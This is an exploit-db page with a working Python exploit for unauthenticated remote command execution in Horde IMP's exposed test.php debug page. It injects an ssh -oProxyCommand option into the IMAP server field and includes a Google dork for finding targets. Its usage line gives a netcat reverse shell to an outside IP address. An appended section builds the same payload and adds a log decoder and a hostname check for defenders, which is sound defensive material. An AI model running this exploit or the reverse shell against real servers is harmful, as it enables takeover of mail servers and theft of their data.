Horde Imp – ‘imap_open’ Remote Command Execution

  • Author: Paolo Serracino, Pietro Minniti, Damiano Proietti
    Date: 2019-01-14
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/46136/
# Exploit Title: Horde Imp Unauthenticated Remote Command Execution
# Google Dork: inurl:/imp/login.php
# Date: 10/01/2019
# Exploit Author: Paolo Serracino - Pietro Minniti - Damiano Proietti
# Vendor Homepage: https://www.horde.org/apps/imp/
# Software Link: https://www.horde.org/download/imp
# Version: All IMP versions
# Tested on: Debian/Ubuntu

import base64
import random
import string
import sys

import requests

'''
 --------------------------------------------------------------------------------------------
| Paolo Serracino - Pietro Minniti - Damiano Proietti - @OmnitechIT                          |
| Horde Imp Unauthenticated Command Execution via imap_open function in exposed debug page   |
 --------------------------------------------------------------------------------------------

Horde Imp, an application that ships with the Horde Groupware/Webmail suite, exposes an
unauthenticated debug page with a form that lets a visitor issue IMAP connections to arbitrary
hosts. The page lives at http://horde_path/imp/test.php and should be deleted after installation.
The 'server' field reaches PHP's imap_open() without any input sanitization; combined with
CVE-2018-19518 (argument injection into the ssh/rsh command the IMAP c-client spawns for the
mailbox host) this allows execution of shell commands as the web server user.
Tested on Debian/Ubuntu.
'''


def check(target):
    """Fingerprint the debug page by its title and a PHP 5.x version banner."""
    # Note: this check only matches PHP 5.x; unpatched PHP 7.0-7.2 builds
    # (before 7.0.33 / 7.1.25 / 7.2.13) are affected by CVE-2018-19518 as well.
    try:
        res_check = requests.get(target)
        if ('PHP Mail Server Support Test' in res_check.text
                and 'PHP Major Version: 5.' in res_check.text):
            print("[+] Target is most likely vulnerable")
            return True
        print("[-] Target doesn't look vulnerable")
        sys.exit()
    except requests.exceptions.RequestException:
        print("[-] Connection Issue")
        return False


def exploit(target, cmd):
    # The command travels base64-encoded and is decoded by the target's shell, so it may
    # contain any character. Spaces inside the injected ssh option are written as $IFS$()
    # because the c-client splits its ssh command line on whitespace; the shell that runs
    # the ProxyCommand expands $IFS back to a separator.
    cmd = base64.b64encode(cmd.encode()).decode()  # Python 3: str -> bytes -> base64 str
    payload1 = random.choice(string.ascii_letters)
    new_headers = {
        'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)',
        'Referer': target,
        'Cookie': 'Horde=klstwo9u52kw7iqy4i22i0iok1;auth_key=klstwo9u52kw7iqy4i22i0iok1;imp_key=klstwo9u52kw7iqy4i22i0iok1;',
    }

    # data is passed as a list of tuples (original author's note: "in order to avoid url encoding by requests")
    res = requests.post(target, headers=new_headers, data=[
        ('server', payload1 + ' -oProxyCommand=echo$IFS$()' + cmd + '|base64$IFS$()-d|sh}'),
        ('port', '143'),
        ('user', 'a'),
        ('passwd', 'a'),
        ('server_type', 'imap'),
        ('f_submit', 'Submit'),
    ])
    print('[+] Sent!')


if len(sys.argv) < 3:
    print("[+] First argument is the path of target's Horde test.php and second the payload as a shell command")
    print('[+] Enclose shell commands between double quotes')
    print('[+] example python horde_imap_cmd.py http://127.0.0.1/horde/imp/test.php "mknod /tmp/bk p; nc 192.168.1.17 443 0</tmp/bk | /bin/bash 1>/tmp/bk"')
    sys.exit()

target = sys.argv[1]  # full URL of test.php, e.g. http://host/horde/imp/test.php
cmd = sys.argv[2]

if check(target):
    exploit(target, cmd)
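The exploit header above describes the mechanism: the `server` field is handed to `imap_open()` unsanitized, and an `-oProxyCommand=` ssh option is smuggled into the host with `$IFS$()` standing in for spaces. The following Python is an added example, not part of the original exploit or of Horde, that reproduces the payload construction, then shows the two things a defender needs beside it: a decoder that recovers the injected shell command from a captured POST body (as it would appear in a proxy or WAF log), and the RFC 1123 hostname check that test.php should have applied before calling `imap_open()`. The function names, the sample POST body and the `a`/`x` prefix letters are assumptions constructed for this example.

```python
import base64
import re
import urllib.parse


# Same construction as the exploit's 'server' field (one prefix letter, then the
# injected ssh option). Spaces become $IFS$() because the IMAP c-client splits its
# ssh command line on whitespace; the shell running the ProxyCommand expands $IFS
# back to a separator. (Added example; the prefix default is an assumption.)
def build_server_field(cmd: str, prefix: str = "x") -> str:
    b64 = base64.b64encode(cmd.encode()).decode()
    return f"{prefix} -oProxyCommand=echo$IFS$(){b64}|base64$IFS$()-d|sh}}"


# Detection side: pull the base64 blob out of a captured 'server' value and decode it.
PROXYCMD_RE = re.compile(r"-oProxyCommand=echo\$IFS\$\(\)([A-Za-z0-9+/=]+)\|base64")


def decode_injected_command(server_field: str):
    """Return the shell command hidden in a ProxyCommand injection, or None."""
    m = PROXYCMD_RE.search(server_field)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode(errors="replace")


def decode_from_post_body(body: str):
    """Decode the injected command from a urlencoded POST body (proxy/WAF log)."""
    fields = urllib.parse.parse_qs(body, keep_blank_values=True)
    server = fields.get("server", [""])[0]
    return decode_injected_command(server)


# Hardening side: what test.php should have done with the host before imap_open().
# Only RFC 1123 hostname labels (letters, digits, hyphen; no leading/trailing hyphen,
# at most 63 chars) are accepted, which also excludes the '{', '}', '/', ':' and space
# characters that matter to c-client mailbox syntax and to ssh option injection.
HOST_LABEL_RE = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def is_safe_imap_host(host: str) -> bool:
    if not host or len(host) > 253:
        return False
    return all(HOST_LABEL_RE.match(label) for label in host.rstrip(".").split("."))


# Constructed sample: the body the exploit would POST for the command `id`,
# as it would appear urlencoded in an access or proxy log.
SAMPLE_POST_BODY = urllib.parse.urlencode([
    ("server", build_server_field("id", prefix="a")),
    ("port", "143"),
    ("user", "a"),
    ("passwd", "a"),
    ("server_type", "imap"),
    ("f_submit", "Submit"),
])

if __name__ == "__main__":
    print("server field:     ", build_server_field("id", prefix="a"))
    print("recovered command:", decode_from_post_body(SAMPLE_POST_BODY))
    for h in ("imap.example.com", "192.168.1.17", build_server_field("id")):
        print(f"{h!r:64} safe={is_safe_imap_host(h)}")
```

The hostname allow-list is deliberately strict: it rejects IPv6 literals and IDN labels, which a real deployment may need to add, but anything it accepts cannot carry an ssh option or a c-client mailbox delimiter. The regex-based decoder only matches this particular encoding of the payload; a variant that uses a different ProxyCommand body would still be caught by the validator, not by the decoder.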